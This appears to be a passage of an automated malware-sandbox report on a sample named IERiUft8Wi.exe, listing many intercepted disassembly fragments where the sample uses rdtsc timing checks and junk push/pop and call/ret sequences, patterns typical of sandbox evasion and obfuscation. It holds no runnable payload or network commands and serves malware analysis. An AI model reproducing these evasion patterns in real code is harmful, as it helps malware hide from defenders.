                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A40CAE second address: A40CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A41284 second address: A41289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A41289 second address: A412A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E3850A358h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A412A5 second address: A412B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A412B8 second address: A412BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A412BC second address: A412C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A412C2 second address: A412C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A412C7 second address: A412CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A41666 second address: A4166B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A416A1 second address: A416FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d jng 00007F0E38E1CB16h 0x00000013 jno 00007F0E38E1CB16h 0x00000019 popad 0x0000001a pop esi 0x0000001b xchg eax, ebx 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F0E38E1CB18h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D2F9Eh], esi 0x0000003d jmp 00007F0E38E1CB1Eh 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A416FA second address: A416FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A417C6 second address: A417EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB1Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E38E1CB1Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A41896 second address: A4189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A421D4 second address: A421D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A421D9 second address: A42249 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007F0E3850A34Eh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F0E3850A348h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push ecx 0x0000002b and edi, dword ptr [ebp+122D1CF1h] 0x00000031 pop esi 0x00000032 mov esi, dword ptr [ebp+122D35DFh] 0x00000038 push 00000000h 0x0000003a jmp 00007F0E3850A357h 0x0000003f push 00000000h 0x00000041 xor edi, dword ptr [ebp+122D2C31h] 0x00000047 push eax 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A42C08 second address: A42C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A42C0C second address: A42C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnl 00007F0E3850A347h 0x0000000e pushad 0x0000000f push edx 0x00000010 sub dword ptr [ebp+122D30E9h], esi 0x00000016 pop ebx 0x00000017 adc edx, 01128500h 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D19FFh], eax 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F0E3850A348h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 call 00007F0E3850A354h 0x00000047 mov edi, dword ptr [ebp+122D2BD1h] 0x0000004d pop edi 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F0E3850A34Eh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A42C86 second address: A42C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4522D second address: A45234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A44525 second address: A4452B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4452B second address: A44538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A45D8E second address: A45D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A45D92 second address: A45D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A45D96 second address: A45E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0E38E1CB18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 sub si, 7641h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0E38E1CB18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov edi, 44069353h 0x0000004c xchg eax, ebx 0x0000004d jmp 00007F0E38E1CB20h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jl 00007F0E38E1CB18h 0x0000005b push edx 0x0000005c pop edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A48C47 second address: A48C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0E3850A346h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A49218 second address: A4927B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007F0E38E1CB1Eh 0x0000000f nop 0x00000010 add dword ptr [ebp+122DB618h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a jnl 00007F0E38E1CB20h 0x00000020 pushad 0x00000021 mov edi, dword ptr [ebp+122D29B9h] 0x00000027 call 00007F0E38E1CB1Ch 0x0000002c call 00007F0E38E1CB26h 0x00000031 pop esi 0x00000032 pop ebx 0x00000033 popad 0x00000034 push eax 0x00000035 push ebx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A47A4B second address: A47A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F0E3850A346h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A47A6F second address: A47A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A493B8 second address: A493CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F0E3850A358h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4A41D second address: A4A423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A493CA second address: A493CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4B5A0 second address: A4B5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E38E1CB1Eh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4A423 second address: A4A4E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E3850A34Dh 0x0000000f nop 0x00000010 push esi 0x00000011 jmp 00007F0E3850A350h 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bx, 7209h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 jmp 00007F0E3850A356h 0x0000002e mov eax, dword ptr [ebp+122D068Dh] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F0E3850A348h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F0E3850A348h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a or bx, 0D33h 0x0000006f nop 0x00000070 pushad 0x00000071 jmp 00007F0E3850A356h 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4D2CE second address: A4D2D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A493CE second address: A4944D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push ecx 0x0000000c mov ebx, edx 0x0000000e pop ebx 0x0000000f mov edi, edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 movzx edi, di 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F0E3850A348h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov eax, dword ptr [ebp+122D0FA5h] 0x00000042 sub dword ptr [ebp+122D25A7h], ecx 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F0E3850A348h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov di, 64B3h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0E3850A34Ch 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4A4E9 second address: A4A4FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0E38E1CB16h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4944D second address: A49453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4D2D2 second address: A4D345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E38E1CB26h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D2B85h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0E38E1CB18h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 call 00007F0E38E1CB23h 0x0000003a or ebx, 7E361A43h 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007F0E38E1CB1Ch 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A49453 second address: A49457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4E2B0 second address: A4E2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0E38E1CB16h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4D509 second address: A4D513 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A4F365 second address: A4F370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E38E1CB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A5247F second address: A52485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A504E6 second address: A50518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E38E1CB25h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A52485 second address: A5248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A5248B second address: A52490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A50518 second address: A5059C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F0E3850A355h 0x0000000e nop 0x0000000f push ecx 0x00000010 mov dword ptr [ebp+122D1BD6h], ecx 0x00000016 pop ebx 0x00000017 sub dword ptr [ebp+122D1C03h], eax 0x0000001d push dword ptr fs:[00000000h] 0x00000024 movsx ebx, cx 0x00000027 mov di, 2DB2h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D3197h], edi 0x00000038 cld 0x00000039 mov eax, dword ptr [ebp+122D0B4Dh] 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F0E3850A348h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 movzx edi, cx 0x0000005c push FFFFFFFFh 0x0000005e mov bx, si 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F0E3850A348h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A52490 second address: A52495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A52AF3 second address: A52AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A52AF7 second address: A52B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0E38E1CB18h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 cld 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E38E1CB1Eh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A55A6E second address: A55A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A55A72 second address: A55A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A53C61 second address: A53C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A53C81 second address: A53C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A55C24 second address: A55C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A53C8A second address: A53C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A569C0 second address: A569C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A569C4 second address: A569D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A569D8 second address: A569DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A57BD2 second address: A57BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A57BE0 second address: A57BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A56CC0 second address: A56CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A56CC4 second address: A56CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A56CCE second address: A56CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A56CD2 second address: A56CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F0E3850A346h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A58C05 second address: A58C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A57D3F second address: A57D49 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A58C0D second address: A58C61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D364Dh], eax 0x00000010 add dword ptr [ebp+122D35BAh], ecx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D19C7h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0E38E1CB18h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a sub dword ptr [ebp+122D2772h], eax 0x00000040 mov bh, 2Eh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jnc 00007F0E38E1CB16h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A58C61 second address: A58C67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A58C67 second address: A58C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
